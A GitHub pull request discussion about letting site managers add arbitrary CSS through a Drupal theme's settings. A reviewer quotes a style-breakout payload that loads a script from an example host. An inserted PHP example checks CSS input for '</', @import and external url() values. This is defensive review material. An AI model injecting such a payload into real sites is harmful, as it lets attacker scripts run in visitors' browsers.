@markconroy
Member

Closes #858

What does this change?

Allows people to add extra CSS to the site via the theme settings.


Thanks to Big Blue Door for sponsoring my time to work on this.

@rupertj
Member

rupertj commented Sep 15, 2025

The problem with this as-is is that there's no filtering or validation of what's put in. For example, you could put this in:

</style>
<script src="https://example.com/cross_site_scripting_attack.js"></script>
<style>

I think if there's a desire to have this, it should validate and sanitise the CSS correctly.
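
A starting point for the kind of validation asked for in the comment above, as an added example that is not part of the pull request or of localgov_base. The function names and the rule set are assumptions; it goes beyond the `</style>` case by also flagging `@import` and external `url()` values.

```php
<?php
// Added example, not localgov_base code. Names and rules are assumptions.

/** Decode CSS backslash escapes so keyword checks see what the CSS parser sees. */
function css_decode_escapes(string $css): string {
  $decoded = preg_replace_callback(
    '/\\\\(?:([0-9a-fA-F]{1,6})\s?|(.))/s',
    static function (array $m): string {
      return $m[1] !== ''
        ? html_entity_decode('&#x' . $m[1] . ';', ENT_QUOTES | ENT_HTML5, 'UTF-8')
        : $m[2];
    },
    $css
  );
  return $decoded ?? $css;
}

/** Return the reasons to reject the CSS; an empty array means it is accepted. */
function extra_css_violations(string $css): array {
  $problems = [];
  // The HTML parser decides where <style> ends and ignores CSS strings,
  // comments and escapes, so this check runs on the raw, undecoded text.
  if (strpos($css, '</') !== false) {
    $problems[] = 'contains "</", which can close the <style> element';
  }
  if (preg_match('/[\x00-\x08\x0B\x0E-\x1F]/', $css)) {
    $problems[] = 'contains control characters';
  }
  $decoded = css_decode_escapes($css);
  if (stripos($decoded, '@import') !== false) {
    $problems[] = 'uses @import to load another stylesheet';
  }
  // A url() value with a scheme or a leading // is fetched from outside the site.
  if (preg_match('~url\(\s*["\']?\s*(?:[a-z][a-z0-9+.-]*:|//)~i', $decoded)) {
    $problems[] = 'url() points at an absolute or protocol-relative address';
  }
  return $problems;
}

// Constructed sample inputs; the second is the input quoted in the comment above.
$samples = [
  'theme tweak'    => ".site-header { color: #005ea5; }\n@media (width < 600px) { h1 { margin: 0; } }",
  'style breakout' => "</style>\n<script src=\"https://example.com/cross_site_scripting_attack.js\"></script>\n<style>",
  'remote import'  => '@import url("https://example.com/remote.css");',
];
foreach ($samples as $label => $css) {
  $problems = extra_css_violations($css);
  printf("%-15s %s\n", $label, $problems ? 'REJECT: ' . implode('; ', $problems) : 'accept');
}
```

Rejecting only `</` rather than every `<` keeps media query range syntax such as `(width < 600px)` valid. The scheme rule also rejects `data:` URLs, which a less strict policy might allow.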

@tonypaulbarker
Contributor

Not keen on this approach - even without potential security holes, maintaining sites with arbitrary code injected via CSS injector and asset injector contrib modules can be something of a challenge.

The discussion on slack is for a use case for making quick prototyping easier and consensus seems to be that this should never be used in production. If it's included in localgov_base it inevitably will be.

I suggest closing this MR and gathering requirements / solutionising that doesn't compromise the end product. The feature request seems to be "how can we do rapid prototyping without needing access to the code / dev tools?".

@finnlewis
Member

Discussing at Merge Tuesday:

  • Mark would not recommend this on a live production site.
  • Tony suggesting that this might be better as a separate module, to allow for prototyping / testing.
  • Maria: 2 issues 1. prototyping 2. something minor for subsites... hex codes for certain colours for example. More broadly, can we review the concept holistically, where might site managers want to manage certain css / visual settings through the browser?
  • Andy: module css_editor https://www.drupal.org/project/css_editor - could be a route for allowing folks to do this.
  • @willguv - what are the design tinkering needs on a production site?

@finnlewis
Member

From discussion in the Product Drop-in yesterday, there was a general feeling that we should move this sort of point and click css changes / injecting CSS to the Scarfolk theme for now to avoid tempting people to do this on a production site.

@finnlewis finnlewis marked this pull request as draft September 23, 2025 11:24

Development

Successfully merging this pull request may close these issues.

Allow extra CSS be added via the UI